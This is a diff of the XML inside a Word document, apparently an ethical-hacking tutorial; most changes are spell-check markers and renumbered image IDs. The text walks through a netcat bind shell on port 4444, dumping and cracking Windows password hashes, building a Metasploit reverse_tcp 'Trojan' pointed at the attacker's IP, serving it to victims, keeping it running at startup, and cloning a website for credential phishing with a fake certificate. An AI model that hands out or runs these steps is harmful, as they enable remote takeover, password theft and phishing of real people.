-        <w:t>pening. ‘-e’ for execute , the next describes what should be executed.</w:t>
+        <w:t>nc.exe –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>lvvp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 4444 –e cmd.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> options l says listen, v says verbose and the p says port. The ‘4444’ in the above command is the port that we are o</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pening. ‘-e’ for </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>execute ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the next describes what should be executed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8726,7 +9799,15 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>This will get connected to the system through port 4444 and executes the command pronmpt.</w:t>
+        <w:t xml:space="preserve">This will get connected to the system through port 4444 and executes the command </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pronmpt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8753,7 +9834,31 @@
         <w:t>Note-</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> There are many other IP address scanners which have a different UI and give different details. The advantage with the third party scanners is we can scan IP addresses in a given range instead of going one by one manually. Some of the IP scanners are: Advanced IP scan, Currports, Global Inventory tool, Super scan and soft perfect scan. There is also another scanner that gives the banner of a device similar to nmap but is not as deep and useful as nmap.-ID serve.</w:t>
+        <w:t xml:space="preserve"> There are many other IP address scanners which have a different UI and give different details. The advantage with the third party scanners is we can scan IP addresses in a given range instead of going one by one manually. Some of the IP scanners are: Advanced IP scan, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Currports</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, Global Inventory tool, Super scan and soft perfect scan. There is also another scanner that gives the banner of a device similar to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> but is not as deep and useful as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.-ID serve.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8836,7 +9941,27 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Code: snow –C –m “message” –p “password” filename and newfile_name.                  [To hide the data]                                                                                                                                     Code:</w:t>
+        <w:t xml:space="preserve">Code: snow –C –m “message” –p “password” filename and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>newfile_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.                  [To hide the data]                                                                                                                                     Code:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8864,7 +9989,7 @@
         </w:rPr>
         <w:pict>
           <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:413.25pt;height:216.75pt">
-            <v:imagedata r:id="rId111" o:title="snowoutput"/>
+            <v:imagedata r:id="rId110" o:title="snowoutput"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -8893,13 +10018,23 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>QuickStego- This a third party app that hides information in a picture.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>QuickStego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>- This a third party app that hides information in a picture.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8945,7 +10080,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId112">
+                    <a:blip r:embed="rId111">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9035,7 +10170,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId113">
+                    <a:blip r:embed="rId112">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9091,7 +10226,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId114">
+                    <a:blip r:embed="rId113">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9142,7 +10277,7 @@
         <w:lastRenderedPageBreak/>
         <w:pict>
           <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:334.5pt;height:288.75pt">
-            <v:imagedata r:id="rId115" o:title="stealthmain"/>
+            <v:imagedata r:id="rId114" o:title="stealthmain"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -9240,10 +10375,23 @@
         <w:t>n</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> electronic assistance. In this method the attacker will simply gather some data and try different passwords to get access. This can also be called as Bruteforce Attack. Ex: Gather information like </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Userid, Date of birth, interested things and try </w:t>
+        <w:t xml:space="preserve"> electronic assistance. In this method the attacker will simply gather some data and try different passwords to get access. This can also be called as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Bruteforce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Attack. Ex: Gather information like </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Userid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, Date of birth, interested things and try </w:t>
       </w:r>
       <w:r>
         <w:t>to break the password with</w:t>
@@ -9307,25 +10455,87 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Now if we see overview of the procedure first we start with getting the password hashdump from the system now we will build a dictionary based on the hashdump. The dictionary built contains the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>different combinations of selected type (it may be a lower alpha , upper alpha, numeric , symbol or a combination of any) along with their hashcode. The last step will be finding out which password combination in the dictionary contains the same hashcode as the data from the hashdump. If it found out any match then you struck gold.</w:t>
+        <w:t xml:space="preserve">Now if we see overview of the procedure first we start with getting the password </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hashdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> from the system now we will build a dictionary based on the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hashdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. The dictionary built contains the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">different combinations of selected type (it may be a lower </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>alpha ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> upper alpha, numeric , symbol or a combination of any) along with their </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hashcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. The last step will be finding out which password combination in the dictionary contains the same </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hashcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> as the data from the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hashdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. If it found out any match then you struck gold.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Tools to be used = pwdump7, winrtgen and</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> RainbowCrack</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Tools to be used = pwdump7, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>winrtgen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>RainbowCrack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">The </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -9333,22 +10543,50 @@
         <w:t xml:space="preserve">pwdump7 </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is used for getting the hashcode of a system . The </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">winrtgen </w:t>
+        <w:t xml:space="preserve"> is</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> used for getting the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hashcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of a system . The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>winrtgen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">creates a dictionary and the </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">RainbowCrack </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>RainbowCrack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>to check for any matches.</w:t>
@@ -9373,7 +10611,15 @@
         <w:t>pwdump7.exe&gt;filename.txt</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. This file contains the hascodes. </w:t>
+        <w:t xml:space="preserve">. This file contains the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hascodes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9389,10 +10635,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Metasploit</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -9402,7 +10650,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>We can create payloads in Metasploit.</w:t>
+        <w:t xml:space="preserve">We can create payloads in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9419,7 +10675,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure both the systems are in the same network .[i.e connected in dome manner]</w:t>
+        <w:t>Ensure both the systems are in the same network .[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i.e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> connected in dome manner]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9449,13 +10713,29 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Open Metasploit console. Code- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>msfconsole.</w:t>
+        <w:t xml:space="preserve">Open </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> console. Code- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9467,13 +10747,105 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Create a Trojan ( this helps us in connecting with the back door).                                                        Code-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> msfvenom –p windows/meterpreter/reverse_tcp LHOST=&lt;hackerip&gt; LPORT=&lt;port&gt; -f &lt;filetype&gt; &gt; &lt;filename.filetype&gt;</w:t>
+        <w:t xml:space="preserve">Create a Trojan </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>( this</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> helps us in connecting with the back door).                                                        Code-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –p windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LHOST=&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>hackerip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>&gt; LPORT=&lt;port&gt; -f &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>filetype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>&gt; &gt; &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>filename.filetype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9481,7 +10853,23 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t>The code given above creates a payload of type windows with reverse tcp. Reverse tcp means connection is given back.</w:t>
+        <w:t xml:space="preserve">The code given above creates a payload of type windows with reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> means connection is given back.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9501,7 +10889,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Now since we don’t have any means to send the payload to the victims here we are just sending it to the victims computer with the help of apache server.</w:t>
+        <w:t xml:space="preserve">Now since we don’t have any means to send the payload to the victims here we are just sending it to the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>victims</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> computer with the help of apache server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9533,11 +10929,47 @@
       <w:r>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Cp Trojan.filetype /var/www/html</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Cp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Trojan.filetype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/www/html</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> this puts the file in the server.</w:t>
@@ -9637,8 +11069,30 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> set payload windows/meterpreter/reverse_tcp</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> set payload windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9651,7 +11105,35 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">            Set LHOST &lt;hacher Ip&gt;</w:t>
+        <w:t xml:space="preserve">            Set LHOST &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>hacher</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9768,7 +11250,21 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>? [gives all available options]</w:t>
+        <w:t>? [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>gives</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> all available options]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9786,12 +11282,34 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Note : The first we need to do after a hack is to find a way to maintain the hack. Here in this case we can put this Trojan file into start up so that the file executes when ever the system is turned on.</w:t>
+        <w:t>Note :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The first we need to do after a hack is to find a way to maintain the hack. Here in this case we can put this Trojan file into start up so that the file executes </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>when ever</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the system is turned on.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9825,16 +11343,29 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Netcraft- </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Netcraft provide internet security services including </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId116" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Netcraft</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Netcraft</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> provide internet security services including </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId115" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9845,7 +11376,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId117" w:history="1">
+      <w:hyperlink r:id="rId116" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9856,7 +11387,7 @@
       <w:r>
         <w:t xml:space="preserve"> and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId118" w:history="1">
+      <w:hyperlink r:id="rId117" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9867,7 +11398,7 @@
       <w:r>
         <w:t xml:space="preserve">. We also analyse many aspects of the internet, including the </w:t>
       </w:r>
-      <w:hyperlink r:id="rId119" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId118" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9878,7 +11409,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId120" w:history="1">
+      <w:hyperlink r:id="rId119" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9889,7 +11420,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId121" w:history="1">
+      <w:hyperlink r:id="rId120" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9900,7 +11431,7 @@
       <w:r>
         <w:t xml:space="preserve"> and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId122" w:history="1">
+      <w:hyperlink r:id="rId121" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9922,8 +11453,16 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>SET [Social engineering tools]-</w:t>
-      </w:r>
+        <w:t>SET [Social engineering tools</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>]-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> This is a suite in kali that provides you with different tools to perform attacks.</w:t>
       </w:r>
@@ -9938,7 +11477,25 @@
         <w:t xml:space="preserve">We need to select </w:t>
       </w:r>
       <w:r>
-        <w:t>the second option [i.e social engineering tool kit] later need to select credential harvesting method and we need to clone a website. It asks for a url to clone and the rest is as simple as a GUI wizard. If followed properly the phishing website will be up and running the rest is up to you how to make your victim make a login in the same site.</w:t>
+        <w:t>the second option [</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i.e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> social engineering tool kit] later need to select credential harvesting method and we need to clone a website. It asks for a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to clone and the rest is as simple as a GUI wizard. If followed properly the phishing website will be up and running the rest is up to you how to make your victim make a login in the same site.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9946,7 +11503,15 @@
         <w:t xml:space="preserve">There is a possibility </w:t>
       </w:r>
       <w:r>
-        <w:t>that few of the site have tools that block the cloning of websites. To get around this we need to use certificate(obviously a fake one) to bluff.</w:t>
